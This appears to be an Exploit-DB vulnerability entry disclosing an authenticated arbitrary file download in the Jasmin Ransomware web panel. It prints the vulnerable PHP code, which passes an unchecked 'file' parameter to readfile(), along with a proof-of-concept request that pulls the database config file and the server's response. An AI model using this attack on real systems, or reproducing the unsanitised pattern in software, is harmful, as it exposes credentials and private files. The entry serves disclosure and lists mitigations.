Jasmin Ransomware - (Authenticated) Arbitrary File Download

vendor:

Jasmin Ransomware

by:

bRpsd cy

7.1

CVSS

HIGH

Arbitrary File Download

CWE

Product Name: Jasmin Ransomware

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE: CVE-2025-XXXXX

CPE: a:codesiddhant:jasmin_ransomware

Metasploit:

Other Scripts:

Platforms Tested: MacOS

2025

Jasmin Ransomware – (Authenticated) Arbitrary File Download

Jasmin Ransomware's web panel allows authenticated users to download arbitrary files due to a SQL Injection vulnerability, potentially leading to unauthorized access to sensitive data. This vulnerability has been assigned CVE-2025-XXXXX.

Mitigation:

To mitigate this vulnerability, ensure proper input validation and parameterized queries to prevent SQL Injection attacks. Additionally, restrict access to sensitive files based on user permissions.

Source

Exploit-DB raw data:

# Exploit Title: Jasmin Ransomware - (Authenticated) Arbitrary File Download
# Google Dork: N/A
# Date: 22-03-2025
# Exploit Author: bRpsd cy[at]live.no
# Vendor Homepage: https://github.com/codesiddhant/Jasmin-Ransomware
# Software Link: https://github.com/codesiddhant/Jasmin-Ransomware
# Version: N/A
# Tested on: MacOS local xampp


Authentication can be easily bypassed due to SQL Injection as mentioned in:
https://www.exploit-db.com/exploits/52091



Vulnerable file:Web Panel/download_file.php
Vulnerable parameter:file
Vulnerable code:
<?php
session_start();
if(!isset($_SESSION['username']) ){
	header("Location: login.php");
}
$file=$_GET['file'];
if(!empty($file)){
    // Define headers
    header("Cache-Control: public");
    header("Content-Description: File Transfer");
    header("Content-Disposition: attachment; filename=$file");
    header("Content-Type: text/encoded");
    header("Content-Transfer-Encoding: binary");
    
    // Read the file
   readfile($file);
    exit;
}else{
    echo 'The file does not exist.';
}
?>


Proof of concept:

http://localhost/Jasmin-Ransomware/Web Panel/download_file.php?file=database/db_conection.php
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Connection: keep-alive
Cookie: PHPSESSID=88e519f73f9013f560ed3f0514015d8c
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

GET: HTTP/1.1 200 OK
Date: Sat, 22 Mar 2025 09:42:09 GMT
Server: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1
X-Powered-By: PHP/7.4.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
Content-Description: File Transfer
Content-Disposition: attachment; filename=database/db_conection.php
Content-Transfer-Encoding: binary
Content-Length: 95
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/encoded;charset=UTF-8